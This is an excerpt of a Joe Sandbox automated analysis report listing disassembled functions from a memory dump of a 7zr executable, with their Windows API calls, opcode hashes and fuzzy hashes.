                          • Opcode ID: c45b6c6d7789726b809df2516d18e406a3a92b1b7325dc1156ae4b9f2243f881
                          • Instruction ID: 53fc6a207859c47f9e3ea1aca0c7df89eca6175be59e511729cdf2be2ec3810b
                          • Opcode Fuzzy Hash: c45b6c6d7789726b809df2516d18e406a3a92b1b7325dc1156ae4b9f2243f881
                          • Instruction Fuzzy Hash: F141C070A0074AEFDB26CFA4C484F6ABBA0BF24318F548A6DD45697691C370ED81CB91
                          APIs
                          • __EH_prolog.LIBCMT ref: 00194255
                            • Part of subcall function 0019440B: __EH_prolog.LIBCMT ref: 00194410
                            • Part of subcall function 00181E0C: malloc.MSVCRT ref: 00181E1F
                            • Part of subcall function 00181E0C: _CxxThrowException.MSVCRT(?,00234B28), ref: 00181E39
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog$ExceptionThrowmalloc
                          • String ID:
                          • API String ID: 3744649731-0
                          • Opcode ID: 6802ff9381f3e81ed58d2edc53a1cd1da33dd35946da9227b701f5b9d7c0bd89
                          • Instruction ID: 316506812d149933166a65c082570e42465b715a9bda25a26275b1554740feb1
                          • Opcode Fuzzy Hash: 6802ff9381f3e81ed58d2edc53a1cd1da33dd35946da9227b701f5b9d7c0bd89
                          • Instruction Fuzzy Hash: 4A5108B0801744DFC726DFA9D1846DAFBF4BF29304F5488AEC09A97652D7B4A608CF61
                          APIs
                          • __EH_prolog.LIBCMT ref: 001AD0E6
                            • Part of subcall function 00181E0C: malloc.MSVCRT ref: 00181E1F
                            • Part of subcall function 00181E0C: _CxxThrowException.MSVCRT(?,00234B28), ref: 00181E39
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: ExceptionH_prologThrowmalloc
                          • String ID:
                          • API String ID: 3978722251-0
                          • Opcode ID: 5397eb439aff4d31544a005b0c1711b4bc38608d5994ded802503c187dc3283e
                          • Instruction ID: 1575db4723513ba00b5d5fc963512f228afbd8b6b3ba983307afe2d4f0840b8d
                          • Opcode Fuzzy Hash: 5397eb439aff4d31544a005b0c1711b4bc38608d5994ded802503c187dc3283e
                          • Instruction Fuzzy Hash: 1441D575A00214AFCB15DFA8D9847AEBBF8FF5A310F244499E446E7682CB70DE01CB90
                          APIs
                          • __EH_prolog.LIBCMT ref: 00197FCA
                            • Part of subcall function 0018950D: SysAllocStringLen.OLEAUT32(?,?), ref: 0018952C
                            • Part of subcall function 0018950D: _CxxThrowException.MSVCRT(?,002355B8), ref: 0018954A
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: AllocExceptionH_prologStringThrow
                          • String ID:
                          • API String ID: 1940201546-0
                          • Opcode ID: 06c4d2ebbd2ec9072456b19d7798a6a28950c3af5fbb384f9dc85e596f7e1ada
                          • Instruction ID: a1879b8926ddc74f02c5c2c96892824b8aa540359975c5401a600a0b8d9c779a
                          • Opcode Fuzzy Hash: 06c4d2ebbd2ec9072456b19d7798a6a28950c3af5fbb384f9dc85e596f7e1ada
                          • Instruction Fuzzy Hash: EC319172820109DACF18AFA4C8559FEB770FF26314F59412AF016B7162EF369A08DB51
                          APIs
                          • __EH_prolog.LIBCMT ref: 001BADBC
                            • Part of subcall function 001BAD29: __EH_prolog.LIBCMT ref: 001BAD2E
                            • Part of subcall function 001BAF2D: __EH_prolog.LIBCMT ref: 001BAF32
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID:
                          • API String ID: 3519838083-0
                          • Opcode ID: 788642f21c0e3fec8dc5efc6612aaf21f38a5c067d6f3e2636997eed7547461e
                          • Instruction ID: 4ae9354f0b0c60e87a7fe1e91f6ec8dddf4f64c11d07b7a38e4e3952eaa5202b
                          • Opcode Fuzzy Hash: 788642f21c0e3fec8dc5efc6612aaf21f38a5c067d6f3e2636997eed7547461e
                          • Instruction Fuzzy Hash: E741BB7144ABC0DEC326DF7881556CAFFE06F35204F94899EC4EA43A52D774A60CCB66
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID:
                          • API String ID: 3519838083-0
                          • Opcode ID: 3231abfcd0f17d12f70e1db3e153709a28994dde95ee2f4466767d608526c29d
                          • Instruction ID: 004892033b04a9f37e59900f126f1bac3e1224099189af58c84877ddcfcd1c5e
                          • Opcode Fuzzy Hash: 3231abfcd0f17d12f70e1db3e153709a28994dde95ee2f4466767d608526c29d
                          • Instruction Fuzzy Hash: 7F314FB8D00209DFCB15DF94C8A18EEBBB4FF9A364B10811DE42A67241C7309E51CBA0
                          APIs
                          • __EH_prolog.LIBCMT ref: 001A98F7
                            • Part of subcall function 001A9987: __EH_prolog.LIBCMT ref: 001A998C
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID:
                          • API String ID: 3519838083-0
                          • Opcode ID: 21f1ede35748a22031f61f581939d35eac84286f25e6b01cc1d1b796328b99db
                          • Instruction ID: 86c1c3ba156703bd0338e6f03619185676ac92220182c72e8d2b7dba6da8bc90
                          • Opcode Fuzzy Hash: 21f1ede35748a22031f61f581939d35eac84286f25e6b01cc1d1b796328b99db
                          • Instruction Fuzzy Hash: B0117C39600205AFCB14CF68C884BABB3A9FF9A354F14855CE956DB261CB31EC50CB60
                          APIs
                          • __EH_prolog.LIBCMT ref: 001A021F
                            • Part of subcall function 00193D66: __EH_prolog.LIBCMT ref: 00193D6B
                            • Part of subcall function 00193D66: GetCurrentProcess.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00193D7D
                            • Part of subcall function 00193D66: OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00193D94
                            • Part of subcall function 00193D66: LookupPrivilegeValueW.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00193DB6
                            • Part of subcall function 00193D66: AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00193DCB
                            • Part of subcall function 00193D66: GetLastError.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00193DD5
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prologProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                          • String ID:
                          • API String ID: 1532160333-0
                          • Opcode ID: c2efd854f93087c89429a87b80ec46f126e144cf1b5758c0bee99562b40fd50a
                          • Instruction ID: 422024960d887bd79e7234092bd73ab9c2ef6b6039e0dd3d4b61d056fbb56a82
                          • Opcode Fuzzy Hash: c2efd854f93087c89429a87b80ec46f126e144cf1b5758c0bee99562b40fd50a
                          • Instruction Fuzzy Hash: 9A214AB1946B90CFC321CF6A82D0686FFF4BB29604B94996FC0DA83B12C370A548CF55
                          APIs
                          • __EH_prolog.LIBCMT ref: 001A1C74
                            • Part of subcall function 00186C72: __EH_prolog.LIBCMT ref: 00186C77
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID:
                          • API String ID: 3519838083-0
                          • Opcode ID: 4766ea23f67c77e239412ffd0874f2b6ac377351d9114eab46704dda4cb1f7de
                          • Instruction ID: 760f8fa5b6868f935cd03fc9babe7d7bbbeeb6f1714621af2a3b55b52b4c00be
                          • Opcode Fuzzy Hash: 4766ea23f67c77e239412ffd0874f2b6ac377351d9114eab46704dda4cb1f7de
                          • Instruction Fuzzy Hash: 8711C035A00204ABCF1AFBE4D992BEDBB79AF25364F000028E842731D2DF755E46CB94
                          APIs
                          • __EH_prolog.LIBCMT ref: 00197E5F
                            • Part of subcall function 00186C72: __EH_prolog.LIBCMT ref: 00186C77
                            • Part of subcall function 00181E40: free.MSVCRT ref: 00181E44
                            • Part of subcall function 0018757D: GetLastError.KERNEL32(0018D14C), ref: 0018757D
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog$ErrorLastfree
                          • String ID:
                          • API String ID: 683690243-0
                          • Opcode ID: 757a50c5e65797b764230fc162411af05476e90fdc62b6c7a4f9e2c4775c79d7
                          • Instruction ID: 1c435ce5d7217b9aba80bbd2e21378422142b2919a84215334fdeb58b1d42951
                          • Opcode Fuzzy Hash: 757a50c5e65797b764230fc162411af05476e90fdc62b6c7a4f9e2c4775c79d7
                          • Instruction Fuzzy Hash: 130104326447009FC721FFB8D8929DEBBB1EF65310F00462EE88353692CB34AA09CB50
                          APIs
                          • __EH_prolog.LIBCMT ref: 001CBF91
                            • Part of subcall function 001CD144: __EH_prolog.LIBCMT ref: 001CD149
                            • Part of subcall function 00181E40: free.MSVCRT ref: 00181E44
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog$free
                          • String ID:
                          • API String ID: 2654054672-0
                          • Opcode ID: 2e86235dc800d6e25e4196365cd5e0ac348dc581110ab7437d625c6c1925ac4b
                          • Instruction ID: d49edc6858842d4391d63f87ccfddd6c042c3bce3d2ab563495809e37d440fe9
                          • Opcode Fuzzy Hash: 2e86235dc800d6e25e4196365cd5e0ac348dc581110ab7437d625c6c1925ac4b
                          • Instruction Fuzzy Hash: 811173B1510B14DFC715EF64D945BCABBF4BF10344F00891CE4AA93591DBB0AA24CF80
                          APIs
                          • SetFileTime.KERNEL32(00000002,00000000,000000FF,00000000,00000000,80000000,00000000,?,00181AD1,00000000,00000002,00000002,?,00187B3E,?,00000000), ref: 00187AFD
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: FileTime
                          • String ID:
                          • API String ID: 1425588814-0
                          • Opcode ID: 2210a2539f3c975e4cbca4e29b832ea1ed3274663600ad1e779bd01ba009a4b7
                          • Instruction ID: 6d00865be4a7ddf0cf8d07abec14a7b5c035c670e7c3cb43ccaace5f7b55eee8
                          • Opcode Fuzzy Hash: 2210a2539f3c975e4cbca4e29b832ea1ed3274663600ad1e779bd01ba009a4b7
                          • Instruction Fuzzy Hash: D6018F30104248BFDF26AF54CC09BEE3FA59B15320F248149B8A9522E1C760DF61DB50
                          APIs
                          • __EH_prolog.LIBCMT ref: 001BC0B8
                            • Part of subcall function 001A7193: __EH_prolog.LIBCMT ref: 001A7198
                            • Part of subcall function 00181E40: free.MSVCRT ref: 00181E44
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog$free
                          • String ID:
                          • API String ID: 2654054672-0
                          • Opcode ID: f9fda2276029604aa0e371b3d030ead22449a177573ada49cc6aac71abda7a5d
                          • Instruction ID: e524e59246960c2a1a7a91e0b8349a77b75ef23e7fd337d622f5535657cc4eff
                          • Opcode Fuzzy Hash: f9fda2276029604aa0e371b3d030ead22449a177573ada49cc6aac71abda7a5d
                          • Instruction Fuzzy Hash: DFF0B476A04612EBD726AF49E8817EEF3ADEF64760F10002FF41197601CBB19D118A90
                          APIs
                          • __EH_prolog.LIBCMT ref: 001C0364
                            • Part of subcall function 001C01C4: __EH_prolog.LIBCMT ref: 001C01C9
                            • Part of subcall function 001C0143: __EH_prolog.LIBCMT ref: 001C0148
                            • Part of subcall function 00181E40: free.MSVCRT ref: 00181E44
                            • Part of subcall function 001C03D8: __EH_prolog.LIBCMT ref: 001C03DD
                            • Part of subcall function 001C004A: __EH_prolog.LIBCMT ref: 001C004F
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog$free
                          • String ID:
                          • API String ID: 2654054672-0
                          • Opcode ID: ecfacca03a0c402f15d9f618e57c9ecdeafe27de1cae9ec6143e3deb7b6b3e0a
                          • Instruction ID: c94737830fe18cf5b7a2ba5d81a9add994ce42872ab9960a825a1b07db513980
                          • Opcode Fuzzy Hash: ecfacca03a0c402f15d9f618e57c9ecdeafe27de1cae9ec6143e3deb7b6b3e0a
                          • Instruction Fuzzy Hash: 7DF0F431928B50EFCB1BFBA8D42279DBBE5AF28314F10465DE452632D2CBB49B048B45
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID:
                          • API String ID: 3519838083-0
                          • Opcode ID: e978cae0711129bea832a965eb647323f1369b31f444c3f62566b704b0aed170
                          • Instruction ID: 70e4d3c28fff522dbe1a6a658d57cc70d1502dd8dd5fab7bfc97caf87e6a55fc
                          • Opcode Fuzzy Hash: e978cae0711129bea832a965eb647323f1369b31f444c3f62566b704b0aed170
                          • Instruction Fuzzy Hash: AFF0C232E1011AEBCB14EF98D8409EFFB78FF58B50B10805AF415E7250CB348A01CB90
                          APIs
                          • __EH_prolog.LIBCMT ref: 001C550A
                            • Part of subcall function 001C4E8A: __EH_prolog.LIBCMT ref: 001C4E8F
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID:
                          • API String ID: 3519838083-0
                          • Opcode ID: ecf90fe317cd3ebda42984158fdce3f76c92a14b795cf9b01d0fe16f10cc05f2
                          • Instruction ID: db479a65935e33799b18707792893248663c3da2dbc07982621216836f07a994
                          • Opcode Fuzzy Hash: ecf90fe317cd3ebda42984158fdce3f76c92a14b795cf9b01d0fe16f10cc05f2
                          • Instruction Fuzzy Hash: 38F0ED32604914EBCB019F48E810FDE7BBAFF88360F11442EF80197202DBB1ED108BA0
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID:
                          • API String ID: 3519838083-0
                          • Opcode ID: 3bcdf244f962b5dce5acd43427410b117b77e47b03c3331759c27d6d016c0ca7
                          • Instruction ID: efd603062670bd51a522d5f7ecc1b55c3c186877ba03a620179b310c178a203c
                          • Opcode Fuzzy Hash: 3bcdf244f962b5dce5acd43427410b117b77e47b03c3331759c27d6d016c0ca7
                          • Instruction Fuzzy Hash: 31E09276614108EFC704EF98D855F9EB7B8FF48354F10841EF00AD7201C7749910CA60
                          APIs
                          • __EH_prolog.LIBCMT ref: 001C5E30
                            • Part of subcall function 001C08B6: __aulldiv.LIBCMT ref: 001C093F
                            • Part of subcall function 0019DFC9: __EH_prolog.LIBCMT ref: 0019DFCE
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog$__aulldiv
                          • String ID:
                          • API String ID: 604474441-0
                          • Opcode ID: 91ab924ef19d1edaf18f4ce68c87656598b506e90756dea8ad5dac2fc461167f
                          • Instruction ID: 5ca444f530bac1d0dcd9bc3da70afd08e549b7f190e76304e866582e702037d1
                          • Opcode Fuzzy Hash: 91ab924ef19d1edaf18f4ce68c87656598b506e90756dea8ad5dac2fc461167f
                          • Instruction Fuzzy Hash: 10E03970E11760DFCB55EFB8A54168EB6E4BB18700F00486EA046D3B41DBB4EA108B80
                          APIs
                          • __EH_prolog.LIBCMT ref: 001C8ED6
                            • Part of subcall function 001C9267: __EH_prolog.LIBCMT ref: 001C926C
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID:
                          • API String ID: 3519838083-0
                          • Opcode ID: 37e88629698fbb47efc05a381660ef5079465f54249a6321c6b22f9a52f1a17a
                          • Instruction ID: 8309a092e5aeffdab7607575047bf0f761df0eb7a6d4e6c504640053e0035530
                          • Opcode Fuzzy Hash: 37e88629698fbb47efc05a381660ef5079465f54249a6321c6b22f9a52f1a17a
                          • Instruction Fuzzy Hash: 1DE09271A249249AC719EB64E522BDDB7E8EF24704F00065DA04392582CBB4A704C781
                          APIs
                          • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00187C8B
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: FileWrite
                          • String ID:
                          • API String ID: 3934441357-0
                          • Opcode ID: 82882a1bb41a98eae23c31bf52135a8a04054365341f65aa26dc08dc58c6ff5b
                          • Instruction ID: cdd2d5bccdc3f739d86cdc733a96989b1d6489c1569212b4508bbf6f1c9d971f
                          • Opcode Fuzzy Hash: 82882a1bb41a98eae23c31bf52135a8a04054365341f65aa26dc08dc58c6ff5b
                          • Instruction Fuzzy Hash: 0DE01A75600209FBCF11DFA5D801B8E7BB9EB09754F20C06AF9199A2A0D739DA50DF54
                          APIs
                          • __EH_prolog.LIBCMT ref: 001CBE6E
                            • Part of subcall function 001C5E2B: __EH_prolog.LIBCMT ref: 001C5E30
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID:
                          • API String ID: 3519838083-0
                          • Opcode ID: 9544d5e055ff2a9dd1d3b4c86c2c2fa22ff09553d3f634d3d424f168f92e0e73
                          • Instruction ID: c3f86080af1e6e70ace1ec9619b7c9f8477e0199359e380f8ffd9797c978d815
                          • Opcode Fuzzy Hash: 9544d5e055ff2a9dd1d3b4c86c2c2fa22ff09553d3f634d3d424f168f92e0e73
                          • Instruction Fuzzy Hash: 81E09271A24A608BD315EB64D411BDDB7E8BB24308F00845EE0A6D3282CFB4AA04CBA5
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
